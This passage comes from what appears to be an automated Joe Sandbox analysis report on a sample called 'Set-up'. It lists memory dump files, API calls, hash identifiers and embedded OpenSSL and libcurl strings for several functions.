                                      • Instruction Fuzzy Hash: 69A12C71B4C3016BD7206A149C02FAF77D1EBA1B14F04492CFA599B3C3E6B9EC00869B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: .%lu$crypto/objects/obj_dat.c
                                      • API String ID: 0-3322715555
                                      • Opcode ID: 4cde179bcb7e066aa5bbe8abd7cd91adbe36d6fabd661112c8c7399de224f969
                                      • Instruction ID: 8a7d4b86e92102e1d0538e4aaf702e92a87b63dffe2adc4ab213779b17083135
                                      • Opcode Fuzzy Hash: 4cde179bcb7e066aa5bbe8abd7cd91adbe36d6fabd661112c8c7399de224f969
                                      • Instruction Fuzzy Hash: 39A1F873A08301DBDB109E15884972BB7E6AFD0704F18862DEC89973C3EB79DC06D696
                                      APIs
                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00540090
                                        • Part of subcall function 005FF340: _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000,?,005400B0,?,?,00000000,00000000,?), ref: 005FF35D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: _time64strlen
                                      • String ID: $$Bad file size (%lld)$File already completely downloaded$Offset (%lld) was beyond file size (%lld)
                                      • API String ID: 3014104814-979756411
                                      • Opcode ID: 60f74e8813188acbf0a06b94401699011d448f406e6b3bbaa2c707722b3631e8
                                      • Instruction ID: d36896f60cd204f9d3246e6d58a30e178a580fcdfc83f6cf3118674f606ace3f
                                      • Opcode Fuzzy Hash: 60f74e8813188acbf0a06b94401699011d448f406e6b3bbaa2c707722b3631e8
                                      • Instruction Fuzzy Hash: EEB1F471A043419FD714DF28C884BAABBE5BFC9318F184A2DF994973A2D770AC448B52
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: No URL set$User-Agent: %s$cannot mix POSTFIELDS with RESUME_FROM$transfer.c
                                      • API String ID: 0-950935550
                                      • Opcode ID: 267712087dfb36fdf1d17e5cc5f9cde4b657595c97232bc8e9dde341e3b9784a
                                      • Instruction ID: 41575423822823cdc6fc070212a310bc7cf6772b52857e2137cda12262178dd8
                                      • Opcode Fuzzy Hash: 267712087dfb36fdf1d17e5cc5f9cde4b657595c97232bc8e9dde341e3b9784a
                                      • Instruction Fuzzy Hash: D7B1C5B1B00A136BE7199B74EC46BA6FFA4BF56315F080229E91C922C1E7717464CBD2
                                      APIs
                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 0066A37F
                                      Strings
                                      • ossl_quic_channel_raise_protocol_error_loc, xrefs: 0066A2D9, 0066A3B0
                                      • ssl/quic/quic_channel.c, xrefs: 0066A2E3, 0066A3BA
                                      • QUIC error code: 0x%llx%s%s%s (triggered by frame type: 0x%llx%s%s%s), reason: "%s", xrefs: 0066A310
                                      • QUIC error code: 0x%llx%s%s%s, reason: "%s", xrefs: 0066A3D5
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: strlen
                                      • String ID: QUIC error code: 0x%llx%s%s%s (triggered by frame type: 0x%llx%s%s%s), reason: "%s"$QUIC error code: 0x%llx%s%s%s, reason: "%s"$ossl_quic_channel_raise_protocol_error_loc$ssl/quic/quic_channel.c
                                      • API String ID: 39653677-1084217658
                                      • Opcode ID: 53d6c60ed0bf3082aafcce32640b22d9d23be201321b45a0f0b5b70ed7727d66
                                      • Instruction ID: 3daec95193396325369e344dd2c96f395b172d6e107ea743cddeef2ff1d76bce
                                      • Opcode Fuzzy Hash: 53d6c60ed0bf3082aafcce32640b22d9d23be201321b45a0f0b5b70ed7727d66
                                      • Instruction Fuzzy Hash: 8451AFB1A04345ABCF00DF64D842E9B7BEAEF98314F04496CFE48E7301E631D9548BA2
                                      APIs
                                      • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,005E0E3B,?,?,00000000,?), ref: 008963E9
                                      • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,005E0E3B,?,?,00000000,?), ref: 008963FB
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: _errno
                                      • String ID:
                                      • API String ID: 2918714741-0
                                      • Opcode ID: 6e7aa1fa2f5c2d9a19cacb472979bf5df24242fd24ea0d786e78c8c0ceda238f
                                      • Instruction ID: 7e7c777cf0602e2083cf180e4e2700c31bae23baa6a515290c1885f6f5fb5d05
                                      • Opcode Fuzzy Hash: 6e7aa1fa2f5c2d9a19cacb472979bf5df24242fd24ea0d786e78c8c0ceda238f
                                      • Instruction Fuzzy Hash: B6419E71A082159BEF04BF699880B2B77E9FB94758F1D4438E84AC7341F674EC249692
                                      APIs
                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 006C691C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: strlen
                                      • String ID: err:%lx:%lx:%lx:%lx$error:%08lX:%s:%s:%s$lib(%lu)$reason(%lu)
                                      • API String ID: 39653677-804487489
                                      • Opcode ID: d63ece2db93a4f5d98ed9ff4f5ad06194d3b80b4f1557b20d0f4416ad2bc596e
                                      • Instruction ID: 47e819acfb565599abf476f5225397b6667973ddf4160b956ff54c50c7dba3df
                                      • Opcode Fuzzy Hash: d63ece2db93a4f5d98ed9ff4f5ad06194d3b80b4f1557b20d0f4416ad2bc596e
                                      • Instruction Fuzzy Hash: 543124B2A043006BFB206A15DC46FFB769EEB90314F04003CFD5892292E776AD14C6BA
                                      APIs
                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,0085ABB9), ref: 0085A34E
                                        • Part of subcall function 006EE270: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(crypto/mem_sec.c,00000187,assertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0,crypto/mem_sec.c,00000185,assertion failed: list >= 0 && list < sh.freelist_size,crypto/mem_sec.c,00000184,-00000001), ref: 006EE28D
                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,0085ABB9), ref: 0085A446
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: strlen$_errno
                                      • String ID: .cnf$.conf$crypto/conf/conf_def.c
                                      • API String ID: 3066963124-3060939390
                                      • Opcode ID: 2340fe4bae0a04bab30d3898203c6dcc47365a85019880d3c8ac10cfc075148f
                                      • Instruction ID: be9a7551e2ea7ea1f8a98cea27472f1e63074db46f51b9dc7c1f9d75903ca835
                                      • Opcode Fuzzy Hash: 2340fe4bae0a04bab30d3898203c6dcc47365a85019880d3c8ac10cfc075148f
                                      • Instruction Fuzzy Hash: B521F7A2D0134667DB103675ACC2E5B76CCEF5135AF080939FC45D6382FA66DE0881A7
                                      APIs
                                      • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,00000000,00000000,00000000,00000100,?,006EF556,00000000,FFFFFFFF,00000000,?,00000000,006F06DF,?), ref: 006A08D7
                                      • memset.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,?,?,00000000,0066973B), ref: 006A0977
                                        • Part of subcall function 006C7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,006EBD91), ref: 006C7262
                                        • Part of subcall function 006C7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,006EBD91), ref: 006C7285
                                        • Part of subcall function 006C7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,006EBD91), ref: 006C72C5
                                        • Part of subcall function 006C7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,006EBD91), ref: 006C72E8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: memsetstrcpystrlen
                                      • String ID: BUF_MEM_grow$crypto/buffer/buffer.c
                                      • API String ID: 1298912638-2735992530
                                      • Opcode ID: 0becd5f9b4e24b800d92aedbaf1d84b25dc08aa19fe1d88091c1f66352754a26
                                      • Instruction ID: 11519ed58a03a8d941761d216e857c1ebdbff6358358434ea380bd54f009c2a1
                                      • Opcode Fuzzy Hash: 0becd5f9b4e24b800d92aedbaf1d84b25dc08aa19fe1d88091c1f66352754a26
                                      • Instruction Fuzzy Hash: BB314C71A443027BF710BA259C02F6BB79AEB42724F188568F81C973C3E765EC198BD5
                                      APIs
                                        • Part of subcall function 00897850: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,008966E9,?,?,?,?,?,?,?,?,?,?,?), ref: 0089787B
                                      • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,UTF-8,00000001,?,?,?,?,00000001,00000000,00000000,?,00000009,?), ref: 008966F5
                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00C211AC,?,?,00000001,00000000,00000000,?,00000009,?), ref: 00896714
                                      • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000,?,00000009,?), ref: 00896727
                                      • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00896776
                                      • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 008967CC
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: _errno$strcmp
                                      • String ID:
                                      • API String ID: 3909137471-0
                                      • Opcode ID: c9f3b9f49874aeae6d8ff69693c5b4b46fa41d5792e126c59f85d6a8eabf8728
                                      • Instruction ID: 60b9d04ab4a15489c4c23fef059659f1f429f6e726e7ceacfb1c0eff504bd9a1
                                      • Opcode Fuzzy Hash: c9f3b9f49874aeae6d8ff69693c5b4b46fa41d5792e126c59f85d6a8eabf8728
                                      • Instruction Fuzzy Hash: 7531A035600202AFDF11BFA8EC44A1A77E9FF5A368F494628F958D7211F731DD218B52
                                      APIs
                                      • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,006F2704,00000008), ref: 006F204D
                                        • Part of subcall function 006C7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,006EBD91), ref: 006C7262
                                        • Part of subcall function 006C7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,006EBD91), ref: 006C7285
                                        • Part of subcall function 006C7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,006EBD91), ref: 006C72C5
                                        • Part of subcall function 006C7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,006EBD91), ref: 006C72E8
                                      • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,?,?,?,?,006F2704,00000008), ref: 006F20C3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: strcpystrlen$memcpymemset
                                      • String ID: copy_integer$crypto/params.c$general_set_int
                                      • API String ID: 2323844366-2562949257
                                      • Opcode ID: 367349b6c20b0ca724441a7c9271552ad6438a8afd0d5071c2d03053b58a3c1a
                                      • Instruction ID: eaf2e302211aadfb4cc90a8040a9046e9a675d5c2f12ae78f71d837e0b9a648e
                                      • Opcode Fuzzy Hash: 367349b6c20b0ca724441a7c9271552ad6438a8afd0d5071c2d03053b58a3c1a
                                      • Instruction Fuzzy Hash: B7213D71A0830A6BD23066289CA6F777797DB45714F18007DFB0CC7383ED56AC55CAA5
                                      APIs
                                      • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,?,?,?,006F299E,00000008), ref: 006F21A8
                                      • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,?,?,?,006F299E,00000008), ref: 006F21FE
                                        • Part of subcall function 006F40A0: memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,?,?,?,006F2075,?,?,?,?,?,?,006F2704,00000008), ref: 006F40C1
                                        • Part of subcall function 006F40A0: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,?,?,?,006F2075,?,?,?,?,?,?,006F2704,00000008), ref: 006F411E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: memcpymemset
